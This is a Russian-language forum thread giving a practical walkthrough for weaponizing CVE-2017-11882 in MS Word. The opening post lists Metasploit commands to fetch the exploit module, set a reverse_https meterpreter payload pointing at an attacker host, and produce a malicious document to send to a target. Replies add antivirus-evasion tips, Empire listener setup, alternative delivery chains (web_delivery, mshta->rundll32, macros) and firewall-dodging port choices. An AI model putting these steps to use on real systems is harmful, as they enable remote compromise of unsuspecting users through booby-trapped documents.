• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

CVE-2017-11882 MS Word Metasploit

adm2

Green Team
05.07.2017
50
120
BIT
0
Добрый день.
Один доллар (@OneDollar) показал пример эксплуатации уязвимости через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа


Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит

Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

Запускаем metasploit и выбираем наш модуль.
Код:
service postgresql start
msfconsole
use exploit/windows/fileformat/office_ms17_11882

Просмотрим информацию о модуле
Код:
info
1.png


Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?

Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
Код:
set FILENAME /root/exp.doc

Можно поставить и *.rtf, отработает и так и так.

Добавляем пейлоад и запускаем
Код:
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit

Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.
2.png


AV так же не стоит на месте

3.png
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)

Информация дана для ознакомления, спасибо за внимание)

Альтернативный вариант пост эксплуатации через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа
 
I

IioS

Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?
Это наверное та что через формулы работает(про него на Хакере была статья). Хороший метод, сама не смогла найти. Спасибо что помог найти:)
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)
Может и не все. DDE на данный момент только половина красное. Хотя пока метод через "формулу" будет краснеть, что-то новое найдется чистое.
 
  • Нравится
Реакции: adm2 и Vertigo

z3r0c10wn

Grey Team
04.09.2017
226
295
BIT
85
Test - windows defender with last updates \ Windows Office unpatched -
Дефендер палит нагрузку но уже после выполнения через memory corruption. Соответственно сессию создаст. Хотя сделает вид что запалил.
 
O

OneDollar

Хорошее дополнение, молодец что подметил!
[doublepost=1511776867,1511776833][/doublepost]
Test - windows defender with last updates \ Windows Office unpatched -
Дефендер палит нагрузку но уже после выполнения через memory corruption. Соответственно сессию создаст. Хотя сделает вид что запалил.
сессия создана будет, но не рабочая..
 

adm2

Green Team
05.07.2017
50
120
BIT
0
За всё время тестов любого ПО я понял, что сессия meterpreter странный предмет, вроде и создана, а вроде и нет =)
 
  • Нравится
Реакции: recrut и woolf1514

z3r0c10wn

Grey Team
04.09.2017
226
295
BIT
85
Хорошее дополнение, молодец что подметил!
[doublepost=1511776867,1511776833][/doublepost]
сессия создана будет, но не рабочая..
15 минут назад тестил - сессия работает! Офис не пропатчен, ломаный. Винда офф - дефендер с последними апдейтами.
Сессия активна.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 347
BIT
0
Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.
 
T

TST

У кого встречалась траблы с Empire, когда выполняешь execute:
[!] Invalid listener ID or name.
Как ее обойти либо решить?
Screenshot from 2017-11-28 16-01-48.png
 

adm2

Green Team
05.07.2017
50
120
BIT
0
У кого встречалась траблы с Empire, когда выполняешь execute:
[!] Invalid listener ID or name.
Как ее обойти либо решить?
Посмотреть вложение 13345
Она у тебя просит поднятый листенер)
Выходишь в основное меню
Код:
main
listeners
uselistener http
execute

А потом уже возвращается в стейджер
2017-11-28_15-15-25.png
 
  • Нравится
Реакции: Vertigo, OneDollar и IioS

ivanov-sv-2015

New member
27.01.2017
2
0
BIT
0
При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?
 

adm2

Green Team
05.07.2017
50
120
BIT
0
При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?
Пха-ха) а о внесении изменений в документ я и не задумывался)) действительно сессия не прилетает)
ну ничего) пройдёт неделька, другая обязательно появится решение)
 

z3r0c10wn

Grey Team
04.09.2017
226
295
BIT
85
Если уж играться с последними АВ и другими средствами защиты винды 10ки- стоит обратить внимание на такие классические вещи которые работают как молоток
если говорить за metasploit - exploit/multi/script/web_delivery
если говорить за другие варианты - cmd->mshta->rundll32
Способы доставки - прекрасный макрос в доке работает по прежнему хорошо.
После получения консоли, можно осмотреться в системе и уже пробоваться варианты обхода UAC если есть\ либо другие варианты повышения привилегий. Ну или прогрузить уже другую удобную вам консольку к примеру используя регистрацию в реестре или еще 100500 разных техник.
Но выше указанные две техники на удивление срабатывают там где палятся более сложные на каком нибудь IPSe

______________________________
И еще стоит юзать динамический пул портов. Зачастую много правил фаерволов блокируют все левые не зарегистрированные сервисы на портах до 10 000 . Поэтому вибираем что то в стиле 46553 и уперед!
 
Последнее редактирование:
  • Нравится
Реакции: OneDollar
L

llein

Копался в PowerShell и столкнулся с проблемой, связанной с данным сплоитом при использовании powershell. Возможно ли через него скачать с обменника и запустить файл? Если да, то как это реализуется? Пытался через wget по сокращенной ссылке, но не сработало((
 

adm2

Green Team
05.07.2017
50
120
BIT
0
Копался в PowerShell и столкнулся с проблемой, связанной с данным сплоитом при использовании powershell. Возможно ли через него скачать с обменника и запустить файл? Если да, то как это реализуется? Пытался через wget по сокращенной ссылке, но не сработало((
Глянь сию серию статей)
https://codeby.net/threads/powershell-dlja-xakera-chast-i.58495/
 
  • Нравится
Реакции: OneDollar
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!